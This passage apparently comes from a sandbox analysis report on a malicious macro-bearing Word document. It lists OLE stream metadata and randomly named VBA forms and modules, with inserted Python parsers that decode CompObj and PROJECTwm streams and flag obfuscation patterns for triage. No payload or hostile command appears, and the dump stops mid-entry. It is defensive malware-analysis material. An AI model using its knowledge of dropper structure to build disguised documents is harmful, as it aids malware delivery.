                                                                                                                        Stream Size:500
                                                                                                                        Entropy:3.89573432818
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . h . . . . . . . T . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a l . d o t m .
                                                                                                                        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 c4 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 68 01 00 00 04 00 00 00 54 01 00 00 05 00 00 00 a4 00 00 00 06 00 00 00 b0 00 00 00 07 00 00 00 bc 00 00 00 08 00 00 00 40 01 00 00 09 00 00 00 d0 00 00 00
                                                                                                                        Stream Path: 1Table, File Type: data, Stream Size: 6493
                                                                                                                        General
                                                                                                                        Stream Path:1Table
                                                                                                                        File Type:data
                                                                                                                        Stream Size:6493
                                                                                                                        Entropy:6.02867552772
                                                                                                                        Base64 Encoded:True
                                                                                                                        Data ASCII:f . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                                                                                                                        Data Raw:66 04 11 00 12 00 01 00 0b 01 0f 00 07 00 03 00 00 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                                                                                                        Stream Path: Data, File Type: data, Stream Size: 99183
                                                                                                                        General
                                                                                                                        Stream Path:Data
                                                                                                                        File Type:data
                                                                                                                        Stream Size:99183
                                                                                                                        Entropy:7.3896106865
                                                                                                                        Base64 Encoded:True
                                                                                                                        Data ASCII:o . . . D . d . . . . . . . . . . . . . . . . . . . . . J F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . . . A . . . . . . . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . i . c . t . u . r . e . . 1 . . . . . . . . . . . . . . . R . . . . . . . . . a ? s . . A . K . . . . 2 . . . . . . . . . . . . . D . . . . . . . . F . . . . . . a ? s . . A . K . . . . 2 . . . . . . . . .
                                                                                                                        Data Raw:6f 83 01 00 44 00 64 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 4a 46 ef 1f 08 02 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 6a 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 83 00 0b f0 46 00 00 00 bf 00 04 00 04 00 04 41 01 00 00 00 05 c1 02 00 00 00 3f 01 00 00 06 00 bf 01 00 00
                                                                                                                        Stream Path: Macros/Bj7zc5k612ib/\x1CompObj, File Type: data, Stream Size: 97
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Bj7zc5k612ib/\x1CompObj
                                                                                                                        File Type:data
                                                                                                                        Stream Size:97
                                                                                                                        Entropy:3.61064918306
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                                                                                                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
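The two \x1CompObj streams above (the root one, 121 bytes, and Macros/Bj7zc5k612ib/\x1CompObj, 97 bytes) are the OLE metadata that tells the host which application class owns the container and the embedded form. The following parser is an added example written for this page; it is not part of the sandbox report or of its tooling. It assumes the MS-OLEDS CompObjStream layout (28-byte header carrying a version and a little-endian CLSID, followed by length-prefixed ANSI strings for user type, clipboard format and ProgID, then a 0x71B239F4 marker and the Unicode copies), and its only input is the byte content copied verbatim from the two "Data Raw" fields shown above. Running it confirms from the bytes rather than from the .doc extension that the root object is the Word.Document.8 class (CLSID {00020906-0000-0000-C000-000000000046}, ProgID Word.Document.8) and that the form object announces itself as "Microsoft Forms 2.0 Form" with a null CLSID and no ProgID; it also checks that the parse consumes exactly the reported stream size, which is a cheap way to catch a truncated or padded stream.

```python
"""Parse MS-OLEDS CompObj streams; sample bytes copied from this report's Data Raw fields."""
import struct
import uuid

# Root \x01CompObj stream (121 bytes) as listed in the report.
ROOT_COMPOBJ = bytes.fromhex(
    "01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 "
    "27 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 57 6f 72 64 20 39 37 "
    "2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 "
    "00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 "
    "00 00 00 00 00 00 00 00 00"
)
# Macros/Bj7zc5k612ib/\x01CompObj stream (97 bytes) as listed in the report.
FORM_COMPOBJ = bytes.fromhex(
    "01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 "
    "19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d "
    "00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 "
    "71 00 00 00 00 00 00 00 00 00 00 00 00"
)
UNICODE_MARKER = 0x71B239F4  # separates the ANSI block from the Unicode copies (MS-OLEDS)


def _u32(buf: bytes, off: int) -> int:
    return struct.unpack_from("<I", buf, off)[0]


def _ansi(buf: bytes, off: int):
    """LengthPrefixedAnsiString: u32 byte count (NUL included), then the bytes."""
    n = _u32(buf, off)
    off += 4
    return buf[off:off + n].rstrip(b"\x00").decode("latin-1"), off + n


def _unicode(buf: bytes, off: int):
    """LengthPrefixedUnicodeString: u32 character count, then UTF-16LE characters."""
    n = _u32(buf, off)
    off += 4
    return buf[off:off + 2 * n].decode("utf-16-le"), off + 2 * n


def _clipboard(buf: bytes, off: int, read_string):
    """ClipboardFormatOrString: 0 = none; 0xFFFFFFFF/0xFFFFFFFE = standard CF_* id; else a named format."""
    marker = _u32(buf, off)
    if marker == 0:
        return None, off + 4
    if marker in (0xFFFFFFFF, 0xFFFFFFFE):
        return _u32(buf, off + 4), off + 8
    return read_string(buf, off)


def parse_compobj(buf: bytes) -> dict:
    """Return the fields of one CompObj stream plus how many bytes the parse consumed."""
    if len(buf) < 28 or buf[:4] != b"\x01\x00\xfe\xff":
        raise ValueError("not a CompObj stream header")
    out = {"version": _u32(buf, 4), "clsid": str(uuid.UUID(bytes_le=buf[12:28]))}
    off = 28
    out["user_type"], off = _ansi(buf, off)
    out["clipboard_format"], off = _clipboard(buf, off, _ansi)
    out["prog_id"], off = _ansi(buf, off)  # named Reserved1 in the spec; carries the ProgID in practice
    # The Unicode tail is optional; only read it when the marker is actually present.
    out["has_unicode"] = off + 4 <= len(buf) and _u32(buf, off) == UNICODE_MARKER
    if out["has_unicode"]:
        off += 4
        out["unicode_user_type"], off = _unicode(buf, off)
        out["unicode_clipboard_format"], off = _clipboard(buf, off, _unicode)
        _, off = _unicode(buf, off)  # Reserved2
    out["consumed"] = off
    return out


def describe(buf: bytes) -> str:
    """One-line triage summary, flagging a size mismatch between parse and stream."""
    c = parse_compobj(buf)
    size_note = "ok" if c["consumed"] == len(buf) else f"MISMATCH consumed={c['consumed']}"
    return (f'{c["user_type"]!r} clsid={c["clsid"]} clip={c["clipboard_format"]!r} '
            f'progid={c["prog_id"] or "-"} size={len(buf)} ({size_note})')


if __name__ == "__main__":
    for name, data in (("root CompObj", ROOT_COMPOBJ), ("Bj7zc5k612ib CompObj", FORM_COMPOBJ)):
        print(f"{name}: {describe(data)}")
```

The `consumed == len(buf)` check is the part worth keeping in a triage script: the report lists each stream's size, and a CompObj whose declared strings do not account for the whole stream is either malformed or carries trailing data that deserves a closer look.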
                                                                                                                        Stream Path: Macros/Bj7zc5k612ib/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 268
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Bj7zc5k612ib/\x3VBFrame
                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                        Stream Size:268
                                                                                                                        Entropy:4.71468555208
                                                                                                                        Base64 Encoded:True
                                                                                                                        Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } B j 7 z c 5 k 6 1 2 i b . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 3 1 6 5 . . C l i e n t L e f t = 4 5 . . C l i e n t T o p = 3 9 0 . . C l i e n t W i d t h = 4 7 1 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r
                                                                                                                        Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 42 6a 37 7a 63 35 6b 36 31 32 69 62 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20
                                                                                                                        Stream Path: Macros/Bj7zc5k612ib/f, File Type: data, Stream Size: 38
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Bj7zc5k612ib/f
                                                                                                                        File Type:data
                                                                                                                        Stream Size:38
                                                                                                                        Entropy:1.54052096453
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:. . . . . . . . . } . . t . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                        Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 74 20 00 00 cf 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                        Stream Path: Macros/Bj7zc5k612ib/o, File Type: empty, Stream Size: 0
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Bj7zc5k612ib/o
                                                                                                                        File Type:empty
                                                                                                                        Stream Size:0
                                                                                                                        Entropy:0.0
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:
                                                                                                                        Data Raw:
                                                                                                                        Stream Path: Macros/Hiuk_v7ho95scpn0j/\x1CompObj, File Type: data, Stream Size: 97
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Hiuk_v7ho95scpn0j/\x1CompObj
                                                                                                                        File Type:data
                                                                                                                        Stream Size:97
                                                                                                                        Entropy:3.61064918306
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                                                                                                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                        Stream Path: Macros/Hiuk_v7ho95scpn0j/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 273
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Hiuk_v7ho95scpn0j/\x3VBFrame
                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                        Stream Size:273
                                                                                                                        Entropy:4.74474576963
                                                                                                                        Base64 Encoded:True
                                                                                                                        Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } H i u k _ v 7 h o 9 5 s c p n 0 j . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 3 1 6 5 . . C l i e n t L e f t = 4 5 . . C l i e n t T o p = 3 9 0 . . C l i e n t W i d t h = 4 7 1 0 . . S t a r t U p P o s i t i o n = 1 ' C
                                                                                                                        Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 48 69 75 6b 5f 76 37 68 6f 39 35 73 63 70 6e 30 6a 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67
                                                                                                                        Stream Path: Macros/Hiuk_v7ho95scpn0j/f, File Type: data, Stream Size: 38
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Hiuk_v7ho95scpn0j/f
                                                                                                                        File Type:data
                                                                                                                        Stream Size:38
                                                                                                                        Entropy:1.54052096453
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:. . . . . . . . . } . . t . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                        Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 74 20 00 00 cf 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                        Stream Path: Macros/Hiuk_v7ho95scpn0j/o, File Type: empty, Stream Size: 0
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Hiuk_v7ho95scpn0j/o
                                                                                                                        File Type:empty
                                                                                                                        Stream Size:0
                                                                                                                        Entropy:0.0
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:
                                                                                                                        Data Raw:
                                                                                                                        Stream Path: Macros/Hvp1hxwgx78q8fg4/\x1CompObj, File Type: data, Stream Size: 97
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Hvp1hxwgx78q8fg4/\x1CompObj
                                                                                                                        File Type:data
                                                                                                                        Stream Size:97
                                                                                                                        Entropy:3.61064918306
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                                                                                                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                        Stream Path: Macros/Hvp1hxwgx78q8fg4/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 272
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Hvp1hxwgx78q8fg4/\x3VBFrame
                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                        Stream Size:272
                                                                                                                        Entropy:4.74008432928
                                                                                                                        Base64 Encoded:True
                                                                                                                        Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } H v p 1 h x w g x 7 8 q 8 f g 4 . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 3 1 6 5 . . C l i e n t L e f t = 4 5 . . C l i e n t T o p = 3 9 0 . . C l i e n t W i d t h = 4 7 1 0 . . S t a r t U p P o s i t i o n = 1 ' C e
                                                                                                                        Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 48 76 70 31 68 78 77 67 78 37 38 71 38 66 67 34 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68
                                                                                                                        Stream Path: Macros/Hvp1hxwgx78q8fg4/f, File Type: data, Stream Size: 38
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Hvp1hxwgx78q8fg4/f
                                                                                                                        File Type:data
                                                                                                                        Stream Size:38
                                                                                                                        Entropy:1.54052096453
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:. . . . . . . . . } . . t . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                        Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 74 20 00 00 cf 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                        Stream Path: Macros/Hvp1hxwgx78q8fg4/o, File Type: empty, Stream Size: 0
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Hvp1hxwgx78q8fg4/o
                                                                                                                        File Type:empty
                                                                                                                        Stream Size:0
                                                                                                                        Entropy:0.0
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:
                                                                                                                        Data Raw:
                                                                                                                        Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 1195
                                                                                                                        General
                                                                                                                        Stream Path:Macros/PROJECT
                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                        Stream Size:1195
                                                                                                                        Entropy:5.43785559038
                                                                                                                        Base64 Encoded:True
                                                                                                                        Data ASCII:I D = " { D 1 C 3 0 D 1 1 - A 0 4 1 - 4 8 D F - 9 2 F A - 8 5 F 9 7 F 3 3 9 D F B } " . . D o c u m e n t = N t x 3 x l e 2 g j t 1 / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . B a s e C l a s s = Z 4 l x 7 r w d f q e . . B a s e C l a s s = B j 7 z c 5 k 6 1 2 i b . . B a s e C l a s s = H v p 1 h x w g x 7 8 q 8 f g 4 . . B a s e C l a s s = U 2 v 6 a y d k x z 3 . . B a s e C l a s s = H i u k _ v 7 h o 9 5 s c p n 0 j . . B a
                                                                                                                        Data Raw:49 44 3d 22 7b 44 31 43 33 30 44 31 31 2d 41 30 34 31 2d 34 38 44 46 2d 39 32 46 41 2d 38 35 46 39 37 46 33 33 39 44 46 42 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 4e 74 78 33 78 6c 65 32 67 6a 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37 37 2d 31 31 43 45 2d 39 46 36 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 0d 0a 42
                                                                                                                        Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 485
                                                                                                                        General
                                                                                                                        Stream Path:Macros/PROJECTwm
                                                                                                                        File Type:data
                                                                                                                        Stream Size:485
                                                                                                                        Entropy:4.2650598546
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:N t x 3 x l e 2 g j t 1 . N . t . x . 3 . x . l . e . 2 . g . j . t . 1 . . . Z 4 l x 7 r w d f q e . Z . 4 . l . x . 7 . r . w . d . f . q . e . . . B j 7 z c 5 k 6 1 2 i b . B . j . 7 . z . c . 5 . k . 6 . 1 . 2 . i . b . . . H v p 1 h x w g x 7 8 q 8 f g 4 . H . v . p . 1 . h . x . w . g . x . 7 . 8 . q . 8 . f . g . 4 . . . U 2 v 6 a y d k x z 3 . U . 2 . v . 6 . a . y . d . k . x . z . 3 . . . H i u k _ v 7 h o 9 5 s c p n 0 j . H . i . u . k . _ . v . 7 . h . o . 9 . 5 . s . c . p . n . 0 . j . . . S
                                                                                                                        Data Raw:4e 74 78 33 78 6c 65 32 67 6a 74 31 00 4e 00 74 00 78 00 33 00 78 00 6c 00 65 00 32 00 67 00 6a 00 74 00 31 00 00 00 5a 34 6c 78 37 72 77 64 66 71 65 00 5a 00 34 00 6c 00 78 00 37 00 72 00 77 00 64 00 66 00 71 00 65 00 00 00 42 6a 37 7a 63 35 6b 36 31 32 69 62 00 42 00 6a 00 37 00 7a 00 63 00 35 00 6b 00 36 00 31 00 32 00 69 00 62 00 00 00 48 76 70 31 68 78 77 67 78 37 38 71 38 66
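The PROJECT and PROJECTwm dumps above, together with the per-form VBFrame streams listed around them, are enough to enumerate this VBA project without opening the document in Word. The Python below is an added example and is not code from the Joe Sandbox report or from the sample: it decodes the PROJECTwm name map (MBCS name, NUL, UTF-16LE name, 0x0000 terminator, per MS-OVBA), parses the Forms 2.0 VBFrame property text, flags groups of UserForms that share caption and geometry while carrying unrelated module names (the pattern visible in this report: every form reads Caption="UserForm1" at 3165/45/390/4710), and cross-checks the module list in PROJECT against PROJECTwm. SAMPLE_MODULES, SAMPLE_PROJECT and the build_* helpers are constructed from the names and fields visible on the page; they are not the truncated raw dumps copied verbatim.

```python
"""Decode the VBA project metadata streams dumped in this report.

Added example, not code from the Joe Sandbox report or from the sample.
Layouts follow MS-OVBA (PROJECT, PROJECTwm) and the Forms 2.0 "\x03VBFrame"
text stream. Everything named SAMPLE_*/build_* is CONSTRUCTED from names
and fields visible in the report; the raw dumps on the page are truncated.
"""
import re
from collections import defaultdict

SAMPLE_MODULES = ["Ntx3xle2gjt1", "Z4lx7rwdfqe", "Bj7zc5k612ib", "Hvp1hxwgx78q8fg4",
                  "U2v6aydkxz3", "Hiuk_v7ho95scpn0j", "Seby_rq4k8mp", "Pkebr_y5xjd5hl070"]

# CONSTRUCTED PROJECT text: the report's dump stops after the fifth BaseClass,
# so the remaining form names are taken from the Macros/<name>/ stream folders.
SAMPLE_PROJECT = ('ID="{D1C30D11-A041-48DF-92FA-85F97F339DFB}"\r\n'
                  "Document=Ntx3xle2gjt1/&H00000000\r\n"
                  "Package={AC9F2F90-E877-11CE-9F68-00AA00574A4F}\r\n"
                  + "".join("BaseClass=%s\r\n" % n for n in SAMPLE_MODULES[1:]))

GEOMETRY = ("ClientHeight", "ClientLeft", "ClientTop", "ClientWidth")
_BEGIN = re.compile(r"Begin\s+\{([0-9A-Fa-f-]{36})\}\s+(\S+)")


def build_projectwm(names):
    """CONSTRUCTED PROJECTwm: per module an MBCS name + NUL, then the UTF-16LE
    name + 0x0000; the stream ends with a bare 0x0000 record."""
    body = b"".join(n.encode("latin-1") + b"\x00" + n.encode("utf-16-le") + b"\x00\x00"
                    for n in names)
    return body + b"\x00\x00"


def build_vbframe(name, caption="UserForm1", height=3165, left=45, top=390, width=4710):
    """CONSTRUCTED VBFrame text using only the fields visible in the report."""
    return ("VERSION 5.00\r\nBegin {C62A69F0-16DC-11CE-9E98-00AA00574A4F} %s \r\n"
            '   Caption         =   "%s"\r\n'
            "   ClientHeight    =   %d\r\n   ClientLeft      =   %d\r\n"
            "   ClientTop       =   %d\r\n   ClientWidth     =   %d\r\n"
            "   StartUpPosition =   1  'CenterOwner\r\nEnd\r\n"
            ) % (name, caption, height, left, top, width)


def parse_projectwm(data):
    """Return [(ansi_name, unicode_name), ...]; a truncated last record is
    returned as far as it decodes instead of raising."""
    entries, pos = [], 0
    while pos + 1 < len(data) and data[pos:pos + 2] != b"\x00\x00":
        nul = data.find(b"\x00", pos)              # end of the MBCS name
        if nul < 0:
            break
        end = nul + 1
        while end + 1 < len(data) and data[end:end + 2] != b"\x00\x00":
            end += 2                                # walk UTF-16 code units
        entries.append((data[pos:nul].decode("latin-1"),
                        data[nul + 1:end].decode("utf-16-le")))
        pos = end + 2
    return entries


def parse_vbframe(text):
    """Parse a VBFrame stream into {'guid', 'name', 'props': {...}}."""
    form = {"guid": None, "name": None, "props": {}}
    for line in (ln.strip() for ln in text.splitlines()):
        if line.startswith("Begin "):
            m = _BEGIN.match(line)
            if m:
                form["guid"], form["name"] = m.group(1).upper(), m.group(2)
        elif "=" in line:
            key, _, val = line.partition("=")
            val = val.strip()
            if val.startswith('"'):                 # quoted string property
                close = val.find('"', 1)
                val = val[1:close] if close > 0 else val[1:]
            else:                                   # number, drop the ' comment
                val = val.split("'", 1)[0].strip()
                if re.fullmatch(r"-?\d+", val):
                    val = int(val)
            form["props"][key.strip()] = val
    return form


def filler_forms(frames):
    """Group forms by caption + geometry; report groups of 2+ whose module name
    differs from the caption (renamed but never edited). Heuristic only."""
    groups = defaultdict(list)
    for f in frames:
        p = f["props"]
        if p.get("Caption") != f["name"]:
            key = (p.get("Caption"),) + tuple(p.get(k) for k in GEOMETRY)
            groups[key].append(f["name"])
    return {k: sorted(v) for k, v in groups.items() if len(v) >= 2}


def cross_check(project_text, wm_entries):
    """Modules declared in PROJECT versus names in PROJECTwm; both should agree."""
    declared = set()
    for line in project_text.splitlines():
        key, _, val = line.partition("=")
        if key in ("Document", "Module", "Class", "BaseClass"):
            declared.add(val.split("/", 1)[0])     # Document=Name/&H00000000
    named = {ansi for ansi, _ in wm_entries}
    return {"only_in_project": sorted(declared - named),
            "only_in_projectwm": sorted(named - declared)}


if __name__ == "__main__":
    wm = parse_projectwm(build_projectwm(SAMPLE_MODULES))
    frames = [parse_vbframe(build_vbframe(n)) for n in SAMPLE_MODULES[1:]]
    print("PROJECTwm modules:", [a for a, _ in wm])
    print("filler form groups:", filler_forms(frames))
    print("PROJECT vs PROJECTwm:", cross_check(SAMPLE_PROJECT, wm))
```

On a real file the stream bytes come from an OLE parser rather than the build_* helpers, for example `olefile.OleFileIO(path).openstream("Macros/PROJECTwm").read()` and the `Macros/<name>/\x03VBFrame` streams listed in this report. A mismatch between PROJECT and PROJECTwm, or a large group of identically sized forms whose captions do not match their module names, is a structural indicator that survives string obfuscation inside the macro code itself.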
                                                                                                                        Stream Path: Macros/Pkebr_y5xjd5hl070/\x1CompObj, File Type: data, Stream Size: 97
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Pkebr_y5xjd5hl070/\x1CompObj
                                                                                                                        File Type:data
                                                                                                                        Stream Size:97
                                                                                                                        Entropy:3.61064918306
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                                                                                                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                        Stream Path: Macros/Pkebr_y5xjd5hl070/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 273
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Pkebr_y5xjd5hl070/\x3VBFrame
                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                        Stream Size:273
                                                                                                                        Entropy:4.74186533966
                                                                                                                        Base64 Encoded:True
